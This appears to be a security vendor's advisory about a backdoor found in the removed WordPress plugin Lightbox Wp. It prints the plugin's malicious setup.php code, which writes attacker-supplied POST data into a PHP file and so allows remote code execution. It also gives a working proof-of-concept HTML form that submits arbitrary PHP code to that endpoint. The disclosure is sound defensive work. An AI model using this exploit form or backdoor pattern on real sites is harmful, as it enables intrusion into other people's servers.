One of the things we do to make sure our customers have the best data on vulnerabilities in WordPress plugins is to monitor hacking attempts on our websites. Through that we recently came across a request for a file, /wp-content/plugins/custom-lightbox/readme.txt, from the plugin Lightbox Wp. That plugin is no longer in the WordPress Plugin Directory, which could have been due to it being removed for a security issue.
Looking the plugin’s code we noticed that the plugin had the same malicious code as we have found in numerous other plugins that are being targeted by hackers (all of those plugins have no longer been in the Plugin Directory when we have come across them). We also found, as we found in one of the others, that the malicious code usually will not produced the intended result.
In the file /setup.php there is following code:
2 3 4 5 6 7 8 9
session_start(); $wizardinstall = $_POST['newins']; $fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/jquery-lightbox-terensis-wp/uninstall.php', 'w'); $wizardinstall = str_replace('\\', '', $wizardinstall); $wizardinstall = htmlentities($wizardinstall); fwrite($fp, html_entity_decode($wizardinstall)); fclose($fp); echo $wizardinstall;
That code could take the contents of POST input “newins” and save it to the file /wp-content/plugins/jquery-lightbox-terensis-wp/uninstall.php, which would be a remote code execution (RCE) vulnerability since the file has .php extension. The problem with that is that the function used to create the file, fopen(), will not create a directory that doesn’t exist, so the code will only work in you already have a directory named “jquery-lightbox-terensis-wp” in the “/wp-content/plugins/” directory. Considering that there isn’t a plugin in the Plugin Directory with that name, it seems unlikely that would be the case for anyone.
Proof of Concept
The following proof of concept will place the specified PHP code in to the file uninstall.php in the directory /wp-content/plugins/jquery-lightbox-terensis-wp/, if that directory already exists.
Make sure to replace “[path to WordPress]” with the location of WordPress and “[PHP code]” with the PHP code you want in the uploaded file.
<html> <body> <form action="http://[path to WordPress]/wp-content/plugins/custom-lightbox/setup.php" method="POST"> <input type="hidden" name="newins" value="[PHP code]" /> <input type="submit" value="Submit" /> </form> </body> </html>